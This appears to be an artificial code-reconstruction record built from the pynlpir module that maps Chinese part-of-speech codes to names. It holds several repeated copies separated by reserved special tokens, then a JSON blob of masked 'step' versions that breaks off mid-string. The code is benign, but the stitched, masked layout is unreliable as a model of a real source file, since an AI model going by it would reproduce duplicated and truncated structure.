'wyy': ('右引号', 'right quotation mark'), 'wj': ('句号', 'period'), 'ww': (
'问号', 'question mark'), 'wt': ('叹号', 'exclamation mark'), 'wd': ('逗号',
'comma'), 'wf': ('分号', 'semicolon'), 'wn': ('顿号', 'enumeration comma'),
'wm': ('冒号', 'colon'), 'ws': ('省略号', 'ellipsis'), 'wp': ('破折号', 'dash'),
'wb': ('百分号千分号', 'percent/per mille sign'), 'wh': ('单位符号',
'unit of measure sign')}), 'g': ('复合语', 'multiword expression'), 'j': (
'略语', 'abbreviation')}
def _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):
"""Gets the part of speech name for *pos_code*."""
if names not in ('parent', 'child', 'all', 'raw'):
raise ValueError(
"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'"
.format(names))
logger.debug("Getting {0} POS name for '{1}' formatted as '{2}'.".
format('English' if english else 'Chinese', pos_code, names))
if names == 'raw':
return pos_code
pos_code = pos_code.lower()
for i in range(1, len(pos_code) + 1):
try:
pos_key = pos_code[0:i]
pos_entry = pos_map[pos_key]
break
except KeyError:
if i == len(pos_code):
logger.warning("part of speech not recognized: '{0}'".
format(pos_code))
return None
pos = pos_entry[1 if english else 0],
if names == 'parent':
logger.debug("Part of speech name found: '{0}'".format(pos[0]))
return pos[0]
if len(pos_entry) == 3 and pos_key != pos_code:
sub_map = pos_entry[2]
logger.debug(
"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'"
.format(pos_entry[1], pos_code))
sub_pos = _get_pos_name(pos_code, names, english, sub_map)
if names == 'all':
pos = pos + sub_pos if sub_pos else pos
else:
pos = sub_pos,
name = pos if names == 'all' else pos[-1]
logger.debug("Part of speech name found: '{0}'".format(name))
return name
def get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):
"""Gets the part of speech name for *code*.
:param str code: The part of speech code to lookup, e.g. ``'nsf'``.
:param str name: Which part of speech name to include in the output. Must
be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.
Defaults to ``'parent'``. ``'parent'`` indicates that only the most
generic name should be used, e.g. ``'noun'`` for ``'nsf'``.
``'child'`` indicates that the most specific name should be used, e.g.
``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all
names should be used, e.g. ``('noun', 'toponym',
'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the
part of speech code is not transformed at all.
:param bool english: Whether to return an English or Chinese name.
:param dict pos_tags: Custom part of speech tags to use.
:returns: ``str`` if *name* is ``'parent'`` or ``'child'``.
``tuple`` if *name* is ``'all'``.
"""
return _get_pos_name(code, name, english, pos_tags)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import logging
logger = logging.getLogger('pynlpir.pos_map')
POS_MAP = {'n': ('名词', 'noun', {'nr': ('人名', 'personal name', {'nr1': (
'汉语姓氏', 'Chinese surname'), 'nr2': ('汉语名字', 'Chinese given name'),
'nrj': ('日语人名', 'Japanese personal name'), 'nrf': ('音译人名',
'transcribed personal name')}), 'ns': ('地名', 'toponym', {'nsf': ('音译地名',
'transcribed toponym')}), 'nt': ('机构团体名', 'organization/group name'),
'nz': ('其它专名', 'other proper noun'), 'nl': ('名词性惯用语', 'noun phrase'),
'ng': ('名词性语素', 'noun morpheme')}), 't': ('时间词', 'time word', {'tg': (
'时间词性语素', 'time morpheme')}), 's': ('处所词', 'locative word'), 'f': (
'方位词', 'noun of locality'), 'v': ('动词', 'verb', {'vd': ('副动词',
'auxiliary verb'), 'vn': ('名动词', 'noun-verb'), 'vshi': ('动词"是"',
'verb 是'), 'vyou': ('动词"有"', 'verb 有'), 'vf': ('趋向动词',
'directional verb'), 'vx': ('行事动词', 'performative verb'), 'vi': (
'不及物动词', 'intransitive verb'), 'vl': ('动词性惯用语', 'verb phrase'), 'vg': (
'动词性语素', 'verb morpheme')}), 'a': ('形容词', 'adjective', {'ad': ('副形词',
'auxiliary adjective'), 'an': ('名形词', 'noun-adjective'), 'ag': (
'形容词性语素', 'adjective morpheme'), 'al': ('形容词性惯用语', 'adjective phrase')}
), 'b': ('区别词', 'distinguishing word', {'bl': ('区别词性惯用语',
'distinguishing phrase')}), 'z': ('状态词', 'status word'), 'r': ('代词',
'pronoun', {'rr': ('人称代词', 'personal pronoun'), 'rz': ('指示代词',
'demonstrative pronoun', {'rzt': ('时间指示代词',
'temporal demonstrative pronoun'), 'rzs': ('处所指示代词',
'locative demonstrative pronoun'), 'rzv': ('谓词性指示代词',
'predicate demonstrative pronoun')}), 'ry': ('疑问代词',
'interrogative pronoun', {'ryt': ('时间疑问代词',
'temporal interrogative pronoun'), 'rys': ('处所疑问代词',
'locative interrogative pronoun'), 'ryv': ('谓词性疑问代词',
'predicate interrogative pronoun')}), 'rg': ('代词性语素',
'pronoun morpheme')}), 'm': ('数词', 'numeral', {'mq': ('数量词',
'numeral-plus-classifier compound'), 'mg': ('干支', 'zodiac')}), 'q': (
'量词', 'classifier', {'qv': ('动量词', 'verbal classifier'), 'qt': ('时量词',
'temporal classifier')}), 'd': ('副词', 'adverb'), 'p': ('介词',
'preposition', {'pba': ('介词“把”', 'preposition 把'), 'pbei': ('介词“被”',
'preposition 被')}), 'c': ('连词', 'conjunction', {'cc': ('并列连词',
'coordinating conjunction')}), 'u': ('助词', 'particle', {'uzhe': ('着',
'particle 着'), 'ule': ('了/喽', 'particle 了/喽'), 'uguo': ('过',
'particle 过'), 'ude1': ('的/底', 'particle 的/底'), 'ude2': ('地',
'particle 地'), 'ude3': ('得', 'particle 得'), 'usuo': ('所', 'particle 所'),
'udeng': ('等/等等/云云', 'particle 等/等等/云云'), 'uyy': ('一样/一般/似的/般',
'particle 一样/一般/似的/般'), 'udh': ('的话', 'particle 的话'), 'uls': (
'来讲/来说/而言/说来', 'particle 来讲/来说/而言/说来'), 'uzhi': ('之', 'particle 之'),
'ulian': ('连', 'particle 连')}), 'e': ('叹词', 'interjection'), 'y': (
'语气词', 'modal particle'), 'o': ('拟声词', 'onomatopoeia'), 'h': ('前缀',
'prefix'), 'k': ('后缀', 'suffix'), 'x': ('字符串', 'string', {'xe': (
'Email字符串', 'email address'), 'xs': ('微博会话分隔符', 'hashtag'), 'xm': (
'表情符合', 'emoticon'), 'xu': ('网址URL', 'URL'), 'xx': ('非语素字',
'non-morpheme character')}), 'w': ('标点符号', 'punctuation mark', {'wkz':
('左括号', 'left parenthesis/bracket'), 'wky': ('右括号',
'right parenthesis/bracket'), 'wyz': ('左引号', 'left quotation mark'),
'wyy': ('右引号', 'right quotation mark'), 'wj': ('句号', 'period'), 'ww': (
'问号', 'question mark'), 'wt': ('叹号', 'exclamation mark'), 'wd': ('逗号',
'comma'), 'wf': ('分号', 'semicolon'), 'wn': ('顿号', 'enumeration comma'),
'wm': ('冒号', 'colon'), 'ws': ('省略号', 'ellipsis'), 'wp': ('破折号', 'dash'),
'wb': ('百分号千分号', 'percent/per mille sign'), 'wh': ('单位符号',
'unit of measure sign')}), 'g': ('复合语', 'multiword expression'), 'j': (
'略语', 'abbreviation')}
def _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):
"""Gets the part of speech name for *pos_code*."""
if names not in ('parent', 'child', 'all', 'raw'):
raise ValueError(
"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'"
.format(names))
logger.debug("Getting {0} POS name for '{1}' formatted as '{2}'.".
format('English' if english else 'Chinese', pos_code, names))
if names == 'raw':
return pos_code
pos_code = pos_code.lower()
for i in range(1, len(pos_code) + 1):
try:
pos_key = pos_code[0:i]
pos_entry = pos_map[pos_key]
break
except KeyError:
if i == len(pos_code):
logger.warning("part of speech not recognized: '{0}'".
format(pos_code))
return None
pos = pos_entry[1 if english else 0],
if names == 'parent':
logger.debug("Part of speech name found: '{0}'".format(pos[0]))
return pos[0]
if len(pos_entry) == 3 and pos_key != pos_code:
sub_map = pos_entry[2]
logger.debug(
"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'"
.format(pos_entry[1], pos_code))
sub_pos = _get_pos_name(pos_code, names, english, sub_map)
if names == 'all':
pos = pos + sub_pos if sub_pos else pos
else:
pos = sub_pos,
name = pos if names == 'all' else pos[-1]
logger.debug("Part of speech name found: '{0}'".format(name))
return name
def get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):
"""Gets the part of speech name for *code*.
:param str code: The part of speech code to lookup, e.g. ``'nsf'``.
:param str name: Which part of speech name to include in the output. Must
be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.
Defaults to ``'parent'``. ``'parent'`` indicates that only the most
generic name should be used, e.g. ``'noun'`` for ``'nsf'``.
``'child'`` indicates that the most specific name should be used, e.g.
``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all
names should be used, e.g. ``('noun', 'toponym',
'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the
part of speech code is not transformed at all.
:param bool english: Whether to return an English or Chinese name.
:param dict pos_tags: Custom part of speech tags to use.
:returns: ``str`` if *name* is ``'parent'`` or ``'child'``.
``tuple`` if *name* is ``'all'``.
"""
return _get_pos_name(code, name, english, pos_tags)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""Part of speech mapping constants and functions for NLPIR/ICTCLAS.
This module is used by :mod:`pynlpir` to format segmented words for output.
"""
import logging
logger = logging.getLogger("pynlpir.pos_map")
#: A dictionary that maps part of speech codes returned by NLPIR to
#: human-readable names (English and Chinese).
POS_MAP = {
"n": (
"名词",
"noun",
{
"nr": (
"人名",
"personal name",
{
"nr1": ("汉语姓氏", "Chinese surname"),
"nr2": ("汉语名字", "Chinese given name"),
"nrj": ("日语人名", "Japanese personal name"),
"nrf": ("音译人名", "transcribed personal name"),
},
),
"ns": (
"地名",
"toponym",
{
"nsf": ("音译地名", "transcribed toponym"),
},
),
"nt": ("机构团体名", "organization/group name"),
"nz": ("其它专名", "other proper noun"),
"nl": ("名词性惯用语", "noun phrase"),
"ng": ("名词性语素", "noun morpheme"),
},
),
"t": (
"时间词",
"time word",
{
"tg": ("时间词性语素", "time morpheme"),
},
),
"s": ("处所词", "locative word"),
"f": ("方位词", "noun of locality"),
"v": (
"动词",
"verb",
{
"vd": ("副动词", "auxiliary verb"),
"vn": ("名动词", "noun-verb"),
"vshi": ('动词"是"', "verb 是"),
"vyou": ('动词"有"', "verb 有"),
"vf": ("趋向动词", "directional verb"),
"vx": ("行事动词", "performative verb"),
"vi": ("不及物动词", "intransitive verb"),
"vl": ("动词性惯用语", "verb phrase"),
"vg": ("动词性语素", "verb morpheme"),
},
),
"a": (
"形容词",
"adjective",
{
"ad": ("副形词", "auxiliary adjective"),
"an": ("名形词", "noun-adjective"),
"ag": ("形容词性语素", "adjective morpheme"),
"al": ("形容词性惯用语", "adjective phrase"),
},
),
"b": (
"区别词",
"distinguishing word",
{
"bl": ("区别词性惯用语", "distinguishing phrase"),
},
),
"z": ("状态词", "status word"),
"r": (
"代词",
"pronoun",
{
"rr": ("人称代词", "personal pronoun"),
"rz": (
"指示代词",
"demonstrative pronoun",
{
"rzt": ("时间指示代词", "temporal demonstrative pronoun"),
"rzs": ("处所指示代词", "locative demonstrative pronoun"),
"rzv": ("谓词性指示代词", "predicate demonstrative pronoun"),
},
),
"ry": (
"疑问代词",
"interrogative pronoun",
{
"ryt": ("时间疑问代词", "temporal interrogative pronoun"),
"rys": ("处所疑问代词", "locative interrogative pronoun"),
"ryv": ("谓词性疑问代词", "predicate interrogative pronoun"),
},
),
"rg": ("代词性语素", "pronoun morpheme"),
},
),
"m": (
"数词",
"numeral",
{
"mq": ("数量词", "numeral-plus-classifier compound"),
"mg": ("干支", "zodiac"),
},
),
"q": (
"量词",
"classifier",
{
"qv": ("动量词", "verbal classifier"),
"qt": ("时量词", "temporal classifier"),
},
),
"d": ("副词", "adverb"),
"p": (
"介词",
"preposition",
{
"pba": ("介词“把”", "preposition 把"),
"pbei": ("介词“被”", "preposition 被"),
},
),
"c": (
"连词",
"conjunction",
{
"cc": ("并列连词", "coordinating conjunction"),
},
),
"u": (
"助词",
"particle",
{
"uzhe": ("着", "particle 着"),
"ule": ("了/喽", "particle 了/喽"),
"uguo": ("过", "particle 过"),
"ude1": ("的/底", "particle 的/底"),
"ude2": ("地", "particle 地"),
"ude3": ("得", "particle 得"),
"usuo": ("所", "particle 所"),
"udeng": ("等/等等/云云", "particle 等/等等/云云"),
"uyy": ("一样/一般/似的/般", "particle 一样/一般/似的/般"),
"udh": ("的话", "particle 的话"),
"uls": ("来讲/来说/而言/说来", "particle 来讲/来说/而言/说来"),
"uzhi": ("之", "particle 之"),
"ulian": ("连", "particle 连"),
},
),
"e": ("叹词", "interjection"),
"y": ("语气词", "modal particle"),
"o": ("拟声词", "onomatopoeia"),
"h": ("前缀", "prefix"),
"k": ("后缀", "suffix"),
"x": (
"字符串",
"string",
{
"xe": ("Email字符串", "email address"),
"xs": ("微博会话分隔符", "hashtag"),
"xm": ("表情符合", "emoticon"),
"xu": ("网址URL", "URL"),
"xx": ("非语素字", "non-morpheme character"),
},
),
"w": (
"标点符号",
"punctuation mark",
{
"wkz": ("左括号", "left parenthesis/bracket"),
"wky": ("右括号", "right parenthesis/bracket"),
"wyz": ("左引号", "left quotation mark"),
"wyy": ("右引号", "right quotation mark"),
"wj": ("句号", "period"),
"ww": ("问号", "question mark"),
"wt": ("叹号", "exclamation mark"),
"wd": ("逗号", "comma"),
"wf": ("分号", "semicolon"),
"wn": ("顿号", "enumeration comma"),
"wm": ("冒号", "colon"),
"ws": ("省略号", "ellipsis"),
"wp": ("破折号", "dash"),
"wb": ("百分号千分号", "percent/per mille sign"),
"wh": ("单位符号", "unit of measure sign"),
},
),
"g": ("复合语", "multiword expression"),
"j": ("略语", "abbreviation"),
}
def _get_pos_name(pos_code, names="parent", english=True, pos_map=POS_MAP):
"""Gets the part of speech name for *pos_code*."""
if names not in ("parent", "child", "all", "raw"):
raise ValueError(
"names must be one of 'parent', 'child', 'all', or "
"'raw'; not '{0}'".format(names)
)
logger.debug(
"Getting {0} POS name for '{1}' formatted as '{2}'.".format(
"English" if english else "Chinese", pos_code, names
)
)
if names == "raw":
return pos_code
pos_code = pos_code.lower() # Issue #10
for i in range(1, len(pos_code) + 1):
try:
pos_key = pos_code[0:i]
pos_entry = pos_map[pos_key]
break
except KeyError:
if i == len(pos_code):
logger.warning("part of speech not recognized: '{0}'".format(pos_code))
return None # Issue #20
pos = (pos_entry[1 if english else 0],)
if names == "parent":
logger.debug("Part of speech name found: '{0}'".format(pos[0]))
return pos[0]
if len(pos_entry) == 3 and pos_key != pos_code:
sub_map = pos_entry[2]
logger.debug(
"Found parent part of speech name '{0}'. Descending to "
"look for child name for '{1}'".format(pos_entry[1], pos_code)
)
sub_pos = _get_pos_name(pos_code, names, english, sub_map)
if names == "all":
# sub_pos can be None sometimes (e.g. for a word '甲')
pos = pos + sub_pos if sub_pos else pos
else:
pos = (sub_pos,)
name = pos if names == "all" else pos[-1]
logger.debug("Part of speech name found: '{0}'".format(name))
return name
def get_pos_name(code, name="parent", english=True, pos_tags=POS_MAP):
"""Gets the part of speech name for *code*.
:param str code: The part of speech code to lookup, e.g. ``'nsf'``.
:param str name: Which part of speech name to include in the output. Must
be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.
Defaults to ``'parent'``. ``'parent'`` indicates that only the most
generic name should be used, e.g. ``'noun'`` for ``'nsf'``.
``'child'`` indicates that the most specific name should be used, e.g.
``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all
names should be used, e.g. ``('noun', 'toponym',
'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the
part of speech code is not transformed at all.
:param bool english: Whether to return an English or Chinese name.
:param dict pos_tags: Custom part of speech tags to use.
:returns: ``str`` if *name* is ``'parent'`` or ``'child'``.
``tuple`` if *name* is ``'all'``.
"""
return _get_pos_name(code, name, english, pos_tags)
|
flexible
|
{
"blob_id": "093b2afef7cdfb7070eb5e94e84624afe495db66",
"index": 1948,
"step-1": "<mask token>\n\n\ndef get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-2": "<mask token>\n\n\ndef _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):\n \"\"\"Gets the part of speech name for *pos_code*.\"\"\"\n if names not in ('parent', 'child', 'all', 'raw'):\n raise ValueError(\n \"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'\"\n .format(names))\n logger.debug(\"Getting {0} POS name for '{1}' formatted as '{2}'.\".\n format('English' if english else 'Chinese', pos_code, names))\n if names == 'raw':\n return pos_code\n pos_code = pos_code.lower()\n for i in range(1, len(pos_code) + 1):\n try:\n pos_key = pos_code[0:i]\n pos_entry = pos_map[pos_key]\n break\n except KeyError:\n if i == len(pos_code):\n logger.warning(\"part of speech not recognized: '{0}'\".\n format(pos_code))\n return None\n pos = pos_entry[1 if english else 0],\n if names == 'parent':\n logger.debug(\"Part of speech name found: '{0}'\".format(pos[0]))\n return pos[0]\n if len(pos_entry) == 3 and pos_key != pos_code:\n sub_map = pos_entry[2]\n logger.debug(\n \"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'\"\n .format(pos_entry[1], pos_code))\n sub_pos = _get_pos_name(pos_code, names, english, sub_map)\n if names == 'all':\n pos = pos + sub_pos if sub_pos else pos\n else:\n pos = sub_pos,\n name = pos if names == 'all' else pos[-1]\n logger.debug(\"Part of speech name found: '{0}'\".format(name))\n return name\n\n\ndef get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-3": "<mask token>\nlogger = logging.getLogger('pynlpir.pos_map')\nPOS_MAP = {'n': ('名词', 'noun', {'nr': ('人名', 'personal name', {'nr1': (\n '汉语姓氏', 'Chinese surname'), 'nr2': ('汉语名字', 'Chinese given name'),\n 'nrj': ('日语人名', 'Japanese personal name'), 'nrf': ('音译人名',\n 'transcribed personal name')}), 'ns': ('地名', 'toponym', {'nsf': ('音译地名',\n 'transcribed toponym')}), 'nt': ('机构团体名', 'organization/group name'),\n 'nz': ('其它专名', 'other proper noun'), 'nl': ('名词性惯用语', 'noun phrase'),\n 'ng': ('名词性语素', 'noun morpheme')}), 't': ('时间词', 'time word', {'tg': (\n '时间词性语素', 'time morpheme')}), 's': ('处所词', 'locative word'), 'f': (\n '方位词', 'noun of locality'), 'v': ('动词', 'verb', {'vd': ('副动词',\n 'auxiliary verb'), 'vn': ('名动词', 'noun-verb'), 'vshi': ('动词\"是\"',\n 'verb 是'), 'vyou': ('动词\"有\"', 'verb 有'), 'vf': ('趋向动词',\n 'directional verb'), 'vx': ('行事动词', 'performative verb'), 'vi': (\n '不及物动词', 'intransitive verb'), 'vl': ('动词性惯用语', 'verb phrase'), 'vg': (\n '动词性语素', 'verb morpheme')}), 'a': ('形容词', 'adjective', {'ad': ('副形词',\n 'auxiliary adjective'), 'an': ('名形词', 'noun-adjective'), 'ag': (\n '形容词性语素', 'adjective morpheme'), 'al': ('形容词性惯用语', 'adjective phrase')}\n ), 'b': ('区别词', 'distinguishing word', {'bl': ('区别词性惯用语',\n 'distinguishing phrase')}), 'z': ('状态词', 'status word'), 'r': ('代词',\n 'pronoun', {'rr': ('人称代词', 'personal pronoun'), 'rz': ('指示代词',\n 'demonstrative pronoun', {'rzt': ('时间指示代词',\n 'temporal demonstrative pronoun'), 'rzs': ('处所指示代词',\n 'locative demonstrative pronoun'), 'rzv': ('谓词性指示代词',\n 'predicate demonstrative pronoun')}), 'ry': ('疑问代词',\n 'interrogative pronoun', {'ryt': ('时间疑问代词',\n 'temporal interrogative pronoun'), 'rys': ('处所疑问代词',\n 'locative interrogative pronoun'), 'ryv': ('谓词性疑问代词',\n 'predicate interrogative pronoun')}), 'rg': ('代词性语素',\n 'pronoun morpheme')}), 'm': ('数词', 'numeral', {'mq': ('数量词',\n 'numeral-plus-classifier compound'), 'mg': ('干支', 'zodiac')}), 'q': (\n '量词', 'classifier', {'qv': ('动量词', 'verbal classifier'), 'qt': ('时量词',\n 'temporal classifier')}), 'd': ('副词', 'adverb'), 'p': ('介词',\n 'preposition', {'pba': ('介词“把”', 'preposition 把'), 'pbei': ('介词“被”',\n 'preposition 被')}), 'c': ('连词', 'conjunction', {'cc': ('并列连词',\n 'coordinating conjunction')}), 'u': ('助词', 'particle', {'uzhe': ('着',\n 'particle 着'), 'ule': ('了/喽', 'particle 了/喽'), 'uguo': ('过',\n 'particle 过'), 'ude1': ('的/底', 'particle 的/底'), 'ude2': ('地',\n 'particle 地'), 'ude3': ('得', 'particle 得'), 'usuo': ('所', 'particle 所'),\n 'udeng': ('等/等等/云云', 'particle 等/等等/云云'), 'uyy': ('一样/一般/似的/般',\n 'particle 一样/一般/似的/般'), 'udh': ('的话', 'particle 的话'), 'uls': (\n '来讲/来说/而言/说来', 'particle 来讲/来说/而言/说来'), 'uzhi': ('之', 'particle 之'),\n 'ulian': ('连', 'particle 连')}), 'e': ('叹词', 'interjection'), 'y': (\n '语气词', 'modal particle'), 'o': ('拟声词', 'onomatopoeia'), 'h': ('前缀',\n 'prefix'), 'k': ('后缀', 'suffix'), 'x': ('字符串', 'string', {'xe': (\n 'Email字符串', 'email address'), 'xs': ('微博会话分隔符', 'hashtag'), 'xm': (\n '表情符合', 'emoticon'), 'xu': ('网址URL', 'URL'), 'xx': ('非语素字',\n 'non-morpheme character')}), 'w': ('标点符号', 'punctuation mark', {'wkz':\n ('左括号', 'left parenthesis/bracket'), 'wky': ('右括号',\n 'right parenthesis/bracket'), 'wyz': ('左引号', 'left quotation mark'),\n 'wyy': ('右引号', 'right quotation mark'), 'wj': ('句号', 'period'), 'ww': (\n '问号', 'question mark'), 'wt': ('叹号', 'exclamation mark'), 'wd': ('逗号',\n 'comma'), 'wf': ('分号', 'semicolon'), 'wn': ('顿号', 'enumeration comma'),\n 'wm': ('冒号', 'colon'), 'ws': ('省略号', 'ellipsis'), 'wp': ('破折号', 'dash'),\n 'wb': ('百分号千分号', 'percent/per mille sign'), 'wh': ('单位符号',\n 'unit of measure sign')}), 'g': ('复合语', 'multiword expression'), 'j': (\n '略语', 'abbreviation')}\n\n\ndef _get_pos_name(pos_code, names='parent', english=True, pos_map=POS_MAP):\n \"\"\"Gets the part of speech name for *pos_code*.\"\"\"\n if names not in ('parent', 'child', 'all', 'raw'):\n raise ValueError(\n \"names must be one of 'parent', 'child', 'all', or 'raw'; not '{0}'\"\n .format(names))\n logger.debug(\"Getting {0} POS name for '{1}' formatted as '{2}'.\".\n format('English' if english else 'Chinese', pos_code, names))\n if names == 'raw':\n return pos_code\n pos_code = pos_code.lower()\n for i in range(1, len(pos_code) + 1):\n try:\n pos_key = pos_code[0:i]\n pos_entry = pos_map[pos_key]\n break\n except KeyError:\n if i == len(pos_code):\n logger.warning(\"part of speech not recognized: '{0}'\".\n format(pos_code))\n return None\n pos = pos_entry[1 if english else 0],\n if names == 'parent':\n logger.debug(\"Part of speech name found: '{0}'\".format(pos[0]))\n return pos[0]\n if len(pos_entry) == 3 and pos_key != pos_code:\n sub_map = pos_entry[2]\n logger.debug(\n \"Found parent part of speech name '{0}'. Descending to look for child name for '{1}'\"\n .format(pos_entry[1], pos_code))\n sub_pos = _get_pos_name(pos_code, names, english, sub_map)\n if names == 'all':\n pos = pos + sub_pos if sub_pos else pos\n else:\n pos = sub_pos,\n name = pos if names == 'all' else pos[-1]\n logger.debug(\"Part of speech name found: '{0}'\".format(name))\n return name\n\n\ndef get_pos_name(code, name='parent', english=True, pos_tags=POS_MAP):\n \"\"\"Gets the part of speech name for *code*.\n\n :param str code: The part of speech code to lookup, e.g. ``'nsf'``.\n :param str name: Which part of speech name to include in the output. Must\n be one of ``'parent'``, ``'child'``, ``'all'``, or ``'raw'``.\n Defaults to ``'parent'``. ``'parent'`` indicates that only the most\n generic name should be used, e.g. ``'noun'`` for ``'nsf'``.\n ``'child'`` indicates that the most specific name should be used, e.g.\n ``'transcribed toponym'`` for ``'nsf'``. ``'all'`` indicates that all\n names should be used, e.g. ``('noun', 'toponym',\n 'transcribed toponym')`` for ``'nsf'``. ``'raw'`` indicates that the\n part of speech code is not transformed at all.\n :param bool english: Whether to return an English or Chinese name.\n :param dict pos_tags: Custom part of speech tags to use.\n :returns: ``str`` if *name* is ``'parent'`` or ``'child'``.\n ``tuple`` if *name* is ``'all'``.\n\n \"\"\"\n return _get_pos_name(code, name, english, pos_tags)\n",
"step-4": "<mask token>\nimport logging\nlogger = logging.getLogger('pynlpir.pos_map')\nPOS_MAP = {'n': ('名词', 'noun', {'nr': ('人名', 'personal name', {'nr1': (\n '汉语姓氏', 'Chinese surname'), 'nr2': ('汉语名字', 'Chinese given name'),\n 'nrj': ('日语人名', 'Japanese personal name'), 'nrf': ('音译人名',\n 'transcribed personal name')}), 'ns': ('地名', 'toponym', {'nsf': ('音译地名',\n 'transcribed toponym')}), 'nt': ('机构团体名', 'organization/group name'),\n 'nz': ('其它专名', 'other proper noun'), 'nl': ('名词性惯用语', 'noun phrase'),\n 'ng': ('名词性语素', 'noun morpheme')}), 't': ('时间词', 'time word', {'tg': (\n '时间词性语素', 'time morpheme')}), 's': ('处所词', 'locative word'), 'f': (\n '方位词', 'noun of locality'), 'v': ('动词', 'verb', {'vd': ('副动词',\n 'auxiliary verb'), 'vn': ('名动词', 'noun-verb'), 'vshi': ('动词\"是\"',\n 'verb 是'), 'vyou': ('动词\"有\"', 'verb 有'), 'vf': ('趋向动词',\n 'directional verb'), 'vx': ('行事动词', 'performative verb'), 'vi': (\n '不及物动词', 'intransitive verb'), 'vl': ('动词性惯用语', 'verb phrase'), 'vg': (\n '动词性语素', 'verb morpheme')}), 'a': ('形容词', 'adjective', {'ad': ('副形词',\n 'auxiliary adjective'), 'an': ('名形词', 'noun-adjective'), 'ag': (\n '形容词性语素', 'adjective morpheme'), 'al': ('形容词性惯用语', 'adjective phrase')}\n ), 'b': ('区别词', 'distinguishing word', {'bl': ('区别词性惯用语',\n 'distinguishing phrase')}), 'z': ('状态词', 'status word'), 'r': ('代词',\n 'pronoun', {'rr': ('人称代词', 'personal pronoun'), 'rz': ('指示代词',\n 'demonstrative pronoun', {'rzt': ('时间指示代词',\n 'temporal demonstrative pronoun'), 'rzs': ('处所指示代词',\n 'locative demonstrative pronoun'), 'rzv': ('谓词性指示代词',\n 'predicate demonstrative pronoun')}), 'ry': ('疑问代词',\n 'interrogative pronoun', {'ryt': ('时间疑问代词',\n 'temporal interrogative pronoun'), 'rys': ('处所疑问代词',\n 'locative interrogative pronoun'), 'ryv': ('谓词性疑问代词',\n 'predicate interrogative pronoun')}), 'rg': ('代词性语素',\n 'pronoun morpheme')}), 'm': ('数词', 'numeral', {'mq': ('数量词',\n 'numeral-plus-classifier compound'), 'mg': ('干支', 'zodiac')}), 'q': (\n '量词', 'classifier', {'qv': ('动量词', 'verbal classifier'), 'qt': ('时量词',\n 'temporal classifier')}), 'd': ('副词', 'adverb'), 'p': ('介词',\n 'preposition', {'pba': ('介词“把”', 'preposition 把'), 'pbei': ('介词“被”',\n 'preposition 被')}), 'c': ('连词', 'conjunction', {'cc': ('并列连词',\n 'coordinating conjunction')}), 'u': ('助词', 'particle', {'uzhe': ('着',\n 'particle 着'), 'ule': ('了/喽', 'particle 了/喽'), 'uguo': ('过',\n 'particle 过'), 'ude1': ('的/底', 'particle 的/底'), 'ude2': ('地',\n 'particle 地'), 'ude3': ('得', 'particle 得'), 'usuo': ('所', 'particle 所'),\n 'udeng': ('等/等等/云云', 'particle 等/等等/云云'), 'uyy': ('一样/一般/似的/般',\n 'particle 一样/一般/似的/般'), 'udh': ('的话', 'particle 的话'), 'uls': (\n '来讲/来说/而言/说来', 'particle 来讲/来说/而言/说来'), 'uzhi': ('之', 'particle 之'),\n 'ulian': ('连', 'particle 连')}), 'e': ('叹词', 'interjection'), 'y': (\n '语气词', 'modal particle'), 'o': ('拟声词', 'onomatopoeia'), 'h': ('前缀',\n 'prefix'), 'k': ('后缀', 'suffix'), 'x': ('字符串', 'string', {'xe': (\n 'Email字符串', 